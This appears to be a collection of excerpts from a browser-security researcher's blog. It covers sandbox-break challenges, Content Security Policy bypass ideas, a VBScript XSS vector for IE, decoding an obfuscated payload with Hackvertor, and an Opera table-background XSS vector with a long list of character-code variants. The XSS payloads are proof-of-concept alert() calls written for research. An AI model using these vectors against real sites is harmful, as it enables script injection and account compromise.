So far it’s going well, I think the experience of hacking sandboxes and hacking my own code has resulted in a better version. I’d like to thank Sirdarckcat (Eduardo Vela) for testing and giving me some great suggestions.

There are a couple of bugs and limitations, at the moment arrays don’t work because of a bug in [] object syntax. I hope to fix this soon though. It also eats new lines when using functions or other stuff, you can get round this at the moment by using ; after the function declaration. The alert function is only supported at the minute but I plan to add more once the code is a bit more stable. Finally there is no DOS protection at the minute and you can probably throw objects in the global scope although you should be able to access other globals or modify them.

So can you break it? Execute code not intended like Function or maybe access global variables other than the $_ prefix and suffix allowed.

Here is a code sample that works fine:-

function x(){ var m=1; this.getM=function(){ return m; } }; y=new x; y.getM()

New JSReg!

Meta tag

The meta tag seems like a bad idea to me, if a site enforced the policy from a http header then a attacker controlled meta tag could merge policy data with an attacker’s evil policy.

Code will not be created from strings

I’m not sure what this is meant to prevent as the allowed section states it allows setTimeout, setInterval with functions as an argument. So you can do this:- setTimeout(function(){alert(1);//any code}); Or redefine existing functions, I’m not sure that preventing tainted javascript will work this way as there are many ways to obfuscate and execute code.

Abusing the whitelist

Finally my other idea was injecting javascript onto itself using a HTML page. This assumes the CSP policy allows scripts to be executed from it’s own domain. The attack also relies on the fact that you can control the output of the entire page or the output is in quirks mode with any E4X breaking code. So the vectors would work like so:-

The script is commented out when the HTML is executed because it references itself as javascript.

alert(1)//<script src="#"></script>

Here the script injects itself and the resulting javascript ignores the script tag as inline e4x:-

alert(1);<script src="#"></script>;

Demo’s of the vectors are available here:-
CSP1 without E4X
CSP2 with E4X

Update…

I’ve updated the vectors and made the e4x one more realistic. Here is a Firefox 3.5 version which gets round the “whole program” error by splitting the HTML and inserting a Javascript statement:-

CSP3 with e4x FF 3.5

Of course these attacks are theoretical because I’ve not actually had chance to test CSP, is there a beta? Anyway these vectors could easily be protected by enforcing script content to have the correct headers and not allow HTML data.

You could use this in dom based XSS situations when you have control over a link. The attack would work like this:-

PHPIDS

But the remote site would include a iframe to the target page and refining parent/top as setTimeout or eval. You could also use “name” in this instance to provide a XSS payload.

Here is the POC for the cross domain in action, I use subdomains in this instance but any domain could be used:-

Safari poc

In addition it checks for window leaks on the object clicked, I use a few methods for this but if anyone has any ideas for additional checks then please leave a comment. There is no property limits at all now because of the revised interface.

New astalanumerator

Anyway here is the vector:-

<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>

POC

You have to rollover the bold “test” on the page to execute and allow scripted windows. The errors are related to the dom injections that are not valid because it’s a HTML injection. You could get round the scripted windows dialog by using other code but I only had 5 mins.

VBScript doesn’t require () to call functions and the plus converts 1 to a number (which it already is), this is used to bypass the need to use quotes within that particular attribute.

Note the XSS Filter in IE8 catches this vector.

It works using a list of js properties stored within an array, you pass an object to it and it checks each of the properties using the array and attempts to navigate through it. Originally I had it enumerating until it reached null but this caused every browser to lock up as some objects went on forever, so I put some limits in place.

I use timeouts to prevent browser lockups and I use list elements to indent each of the objects, this is nice because I can delay the result and continue the loop while the object has finished enumerating. The third parameter of the inspect function handles this by storing the target element so each of the objects can be linked together.

Limits

The limits in place help stop browser crashes here is how they work:-
1. Number of properties to enum:
This is the limit of valid properties of the object, it will only evaluate 10 per object by default.
2. Number of inner properties to enum:
The inner properties limit is the amount of child properties to enumerate.
3. Only enum objects?:
This option allows you to enum all properties even numbers, by default it is restricted to objects only.

Astalanumerator demo

Warning disclaimer

Do not try and execute the javascript provided, only use it within the Hackvertor input window. I have not executed or tested what the code does I have only decoded. Use this tutorial at your own risk.

Decoding

I’ve tidied up the code if you would like to see how it’s encoded.

The code is quite simple, a large string is used as the payload which I’ve renamed “payload”. “r28″ does nothing it is a empty string, I guess it’s there to make decoding more difficult. It doesn’t.

The payload is then looped through until the end of the string and two characters are extracted in each loop. These two characters are passed to a “fromHex” function which I’ve helpfully renamed and the parseInt function is used to transform the characters from hex into decimal numbers.

Then the result is stored in the “decoded” string which again I’ve renamed, before finally passing the decoded string to the document.write call which sends the result to be outputted to the page.

Light work for Hackvertor

Pretty easy so far eh? The code isn’t heavily obfuscated and is pretty easy to understand. I’ve talked about making it more difficult but no matter how difficult it is the encoding will eventually lose the race.

To decode it with Hackvertor we need to first remove any unneeded strings like the “r28″ variable which actually contains nothing. We can do this with the replace tag in Hackvertor, look in the HVURL at the bottom and you’ll see the first replace tag. Remember Hackvertor works from the inner part outwards.

<@replace_25("'\+r28\+'",)>

The first part is just the name and number of the tag “replace_25″, the parenthesis indicate that it’s a Hackvertor parameter. In this case replace accepts “find this” as the first param and a second param which is the replace string. So we use “‘\+r28\+’” to find the blank variable and replace it with nothing. It works as a regular expression that’s why the + has been escaped.

Next we use the replace tag again to remove all instances of single quotes or semi-colons

<@replace_26("[';]",)>

Then we use the

<@find_0(.{2},gim)>

tag to extract the two hex characters we require again this is a regular expression. This tag returns the matches as a comma separated list.

We use the comma separated hex values with our next tag

<@hex2dec_0(',')>

which loops through the commas and converts every hex sequence into decimal. The param tells the tag to use a regular expression to split the characters in this case it is commas.

<@fromcharcodes_1>

is used to convert our now decimal sequence of characters into the actual characters from the character code number. This tag does not use params.

Finally I use

<@find_1("'.+'",gim)>

to find the urlencoded sequence, replace any unwanted characters with

<@replace_2("'",)>

which removes all single quotes.

<@d_enc_3>

simple urldecodes the sequence which returns our decoded string.

The final result is available here and the javascript never gets executed only decoded.

Suddenly minor flaws in web sites could be abused to take down entire web sites for long periods by a remote connection from the server. In order for this law to work it would have to be automated and automation leads to abuse, not being able to identify the user that was directly responsible makes this law a terrible idea.

It’s clear to me that whoever thought of this law has no idea how the internet works or how it can be abused. If this law is ever passed it will be bad news for everyone on the internet, from a censorship and security perspective.

Surprisingly Opera still supports the table background vector and combining my protocol discoveries you can create some cool additional vectors. The table background vector looks like this:-

<table background=javascript:alert(1)>

Now we can combine it with some of the unicode characters that work after the javascript string and before the colon:-

<table background=javascript&#14848:alert(1)>

The characters can be repeated many times like this:-

<table background=javascript&#14848&#14848&#14848&#14848&#14848:alert(1)>

Lots of other characters seem to be affected, I’ve randomly tested a few like 11520 but I haven’t verified them all. Here are a list of the characters:-

Char:9,Link:javascript&#9:
Char:10,Link:javascript&#10:
Char:13,Link:javascript&#13:
Char:58,Link:javascript&#58:
Char:2048,Link:javascript&#2048:
Char:2304,Link:javascript&#2304:
Char:3840,Link:javascript&#3840:
Char:4096,Link:javascript&#4096:
Char:4256,Link:javascript&#4256:
Char:4352,Link:javascript&#4352:
Char:4608,Link:javascript&#4608:
Char:4864,Link:javascript&#4864:
Char:5120,Link:javascript&#5120:
Char:5376,Link:javascript&#5376:
Char:5632,Link:javascript&#5632:
Char:5888,Link:javascript&#5888:
Char:6400,Link:javascript&#6400:
Char:6656,Link:javascript&#6656:
Char:7424,Link:javascript&#7424:
Char:7936,Link:javascript&#7936:
Char:7944,Link:javascript&#7944:
Char:11520,Link:javascript&#11520:
Char:12544,Link:javascript&#12544:
Char:13312,Link:javascript&#13312:
Char:13568,Link:javascript&#13568:
Char:13824,Link:javascript&#13824:
Char:14080,Link:javascript&#14080:
Char:14336,Link:javascript&#14336:
Char:14592,Link:javascript&#14592:
Char:14848,Link:javascript&#14848:
Char:15104,Link:javascript&#15104:
Char:15360,Link:javascript&#15360:
Char:15616,Link:javascript&#15616:
Char:15872,Link:javascript&#15872:
Char:16128,Link:javascript&#16128:
Char:16384,Link:javascript&#16384:
Char:16640,Link:javascript&#16640:
Char:16896,Link:javascript&#16896:
Char:17152,Link:javascript&#17152:
Char:17408,Link:javascript&#17408:
Char:17664,Link:javascript&#17664:
Char:17920,Link:javascript&#17920:
Char:18176,Link:javascript&#18176:
Char:18432,Link:javascript&#18432:
Char:18688,Link:javascript&#18688:
Char:18944,Link:javascript&#18944:
Char:19200,Link:javascript&#19200:
Char:19456,Link:javascript&#19456:
Char:19712,Link:javascript&#19712:
Char:19968,Link:javascript&#19968:
Char:20224,Link:javascript&#20224:
Char:20480,Link:javascript&#20480:
Char:20736,Link:javascript&#20736:
Char:20992,Link:javascript&#20992:
Char:21248,Link:javascript&#21248:
Char:21504,Link:javascript&#21504:
Char:21760,Link:javascript&#21760:
Char:22016,Link:javascript&#22016:
Char:22272,Link:javascript&#22272:
Char:22528,Link:javascript&#22528:
Char:22784,Link:javascript&#22784:
Char:23040,Link:javascript&#23040:
Char:23296,Link:javascript&#23296:
Char:23552,Link:javascript&#23552:
Char:23808,Link:javascript&#23808:
Char:24064,Link:javascript&#24064:
Char:24320,Link:javascript&#24320:
Char:24576,Link:javascript&#24576:
Char:24832,Link:javascript&#24832:
Char:25088,Link:javascript&#25088:
Char:25344,Link:javascript&#25344:
Char:25600,Link:javascript&#25600:
Char:25856,Link:javascript&#25856:
Char:26112,Link:javascript&#26112:
Char:26368,Link:javascript&#26368:
Char:26624,Link:javascript&#26624:
Char:26880,Link:javascript&#26880:
Char:27136,Link:javascript&#27136:
Char:27392,Link:javascript&#27392:
Char:27648,Link:javascript&#27648:
Char:27904,Link:javascript&#27904:
Char:28160,Link:javascript&#28160:
Char:28416,Link:javascript&#28416:
Char:28672,Link:javascript&#28672:
Char:28928,Link:javascript&#28928:
Char:29184,Link:javascript&#29184:
Char:29440,Link:javascript&#29440:
Char:29696,Link:javascript&#29696:
Char:29952,Link:javascript&#29952:
Char:30208,Link:javascript&#30208:
Char:30464,Link:javascript&#30464:
Char:30720,Link:javascript&#30720:
Char:30976,Link:javascript&#30976:
Char:31232,Link:javascript&#31232:
Char:31488,Link:javascript&#31488:
Char:31744,Link:javascript&#31744:
Char:32000,Link:javascript&#32000:
Char:32256,Link:javascript&#32256:
Char:32512,Link:javascript&#32512:
Char:32768,Link:javascript&#32768:
Char:33024,Link:javascript&#33024:
Char:33280,Link:javascript&#33280:
Char:33536,Link:javascript&#33536:
Char:33792,Link:javascript&#33792:
Char:34048,Link:javascript&#34048:
Char:34304,Link:javascript&#34304:
Char:34560,Link:javascript&#34560:
Char:34816,Link:javascript&#34816:
Char:35072,Link:javascript&#35072:
Char:35328,Link:javascript&#35328:
Char:35584,Link:javascript&#35584:
Char:35840,Link:javascript&#35840:
Char:36096,Link:javascript&#36096:
Char:36352,Link:javascript&#36352:
Char:36608,Link:javascript&#36608:
Char:36864,Link:javascript&#36864:
Char:37120,Link:javascript&#37120:
Char:37376,Link:javascript&#37376:
Char:37632,Link:javascript&#37632:
Char:37888,Link:javascript&#37888:
Char:38144,Link:javascript&#38144:
Char:38400,Link:javascript&#38400:
Char:38656,Link:javascript&#38656:
Char:38912,Link:javascript&#38912:
Char:39168,Link:javascript&#39168:
Char:39424,Link:javascript&#39424:
Char:39680,Link:javascript&#39680:
Char:39936,Link:javascript&#39936:
Char:40192,Link:javascript&#40192:
Char:40448,Link:javascript&#40448:
Char:40704,Link:javascript&#40704:
Char:40960,Link:javascript&#40960:
Char:41216,Link:javascript&#41216:
Char:41472,Link:javascript&#41472:
Char:41728,Link:javascript&#41728:
Char:41984,Link:javascript&#41984:
Char:43008,Link:javascript&#43008:
Char:44032,Link:javascript&#44032:
Char:44288,Link:javascript&#44288:
Char:44544,Link:javascript&#44544:
Char:44800,Link:javascript&#44800:
Char:45056,Link:javascript&#45056:
Char:45312,Link:javascript&#45312:
Char:45568,Link:javascript&#45568:
Char:45824,Link:javascript&#45824:
Char:46080,Link:javascript&#46080:
Char:46336,Link:javascript&#46336:
Char:46592,Link:javascript&#46592:
Char:46848,Link:javascript&#46848:
Char:47104,Link:javascript&#47104:
Char:47360,Link:javascript&#47360:
Char:47616,Link:javascript&#47616:
Char:47872,Link:javascript&#47872:
Char:48128,Link:javascript&#48128:
Char:48384,Link:javascript&#48384:
Char:48640,Link:javascript&#48640:
Char:48896,Link:javascript&#48896:
Char:49152,Link:javascript&#49152:
Char:49408,Link:javascript&#49408:
Char:49664,Link:javascript&#49664:
Char:49920,Link:javascript&#49920:
Char:50176,Link:javascript&#50176:
Char:50432,Link:javascript&#50432:
Char:50688,Link:javascript&#50688:
Char:50944,Link:javascript&#50944:
Char:51200,Link:javascript&#51200:
Char:51456,Link:javascript&#51456:
Char:51712,Link:javascript&#51712:
Char:51968,Link:javascript&#51968:
Char:52224,Link:javascript&#52224:
Char:52480,Link:javascript&#52480:
Char:52736,Link:javascript&#52736:
Char:52992,Link:javascript&#52992:
Char:53248,Link:javascript&#53248:
Char:53504,Link:javascript&#53504:
Char:53760,Link:javascript&#53760:
Char:54016,Link:javascript&#54016:
Char:54272,Link:javascript&#54272:
Char:54528,Link:javascript&#54528:
Char:54784,Link:javascript&#54784:
Char:55040,Link:javascript&#55040:

My idea was to redefine the alert function and to remove it once it reaches a certain limit, in order to avoid infinite prompts. I think I’ve been successful but I’m sure someone will point out if I haven’t. It works by storing the native function in a closure and holds the reference within it’s parent. The child function is then returned with two private variables the native function call and a counter. Because they are private variables they shouldn’t be available in the global scope and so only the parent of the the child function should have access to them.

This code is based on the assumption that it is run first before any other Javascript, so you can modify it after it’s been executed but you should no longer have access to it’s native code.

window.alert = function(native) {
 var counter = 0;
 return function(str) {    
    native(str);
    if(counter > 10) {
      window.alert = null;
    }
    counter++;
 }
}(window.alert);